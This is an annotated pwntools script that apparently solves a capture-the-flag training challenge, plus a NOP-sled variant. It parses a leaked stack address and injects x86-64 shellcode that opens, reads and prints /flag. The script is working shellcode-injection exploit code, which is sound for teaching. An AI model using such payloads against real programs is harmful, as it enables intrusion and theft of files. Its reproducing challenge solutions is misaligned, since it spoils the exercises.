1
# Walkthrough script for the local training binary /challenge/babyshell_level1.
# The target prints the stack address at which it will place the bytes we send
# and then executes them; this script assembles a tiny read-the-flag payload
# (open /flag, read it into scratch space, write it to stdout) and hands the
# session back to the user.
from pwn import *
# Show pwntools' info-level progress messages (process spawn, send/recv sizes).
context.log_level='info'
# Spawn the challenge as a local child process; all following tube calls talk to it.
r = process("/challenge/babyshell_level1")
# Block until the banner that precedes the leaked hex address has been printed.
# NOTE(review): the delimiter is a str; recent pwntools releases expect bytes
# (b"...") for tube I/O -- confirm against the installed version.
r.recvuntil("[LEAK] Placing shellcode on the stack at 0x")
# The rest of the line holds the hex digits; the last two bytes are dropped before
# parsing -- presumably a trailing punctuation character plus the newline.
# Verify against the actual banner if the parse ever raises ValueError.
addr: int = int(r.recvline()[:-2], 16)
log.success("addr => {}".format(hex(addr)))
# Build the payload from shellcraft templates (assembly source, not bytes yet):
#   open("/flag")        -> file descriptor returned in rax
#   read(rax, buf, 0x100) -> copy up to 0x100 bytes of the file into buf
#   write(1, buf, 0x100)  -> echo that buffer to fd 1 (stdout)
# buf = addr + 0x100 reuses the leaked stack buffer as scratch space; this assumes
# the assembled shellcode is shorter than 0x100 bytes so the scratch area does not
# overlap the code being executed -- check len(payload) if the payload grows.
shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)
# Assemble the x86-64 source into raw machine-code bytes.
payload: bytes = asm(shellcode, arch='amd64')
# Drain whatever prompt output is pending before sending (blocks until some
# data arrives; a silent target would hang here).
r.recv()
# sendline appends a newline after the payload; that extra byte lands in the
# buffer after the shellcode and is never executed.
r.sendline(payload)
# Hand the tube to the terminal so the flag output (and anything else) is visible.
r.interactive()
2
# Variant of the assembly step: left-pad the machine code with 0x90 (the
# single-byte x86 `nop`) to a fixed 0x900-byte payload so the shellcode sits at
# the end of the buffer. Relies on `shellcode` from the first snippet; with this
# padding the code no longer starts at `addr`, so the addr+0x100 scratch area
# used by read/write now overlaps the padding rather than the code.
payload = asm(shellcode, arch='amd64').rjust(0x900, b'\x90')
Q.E.D.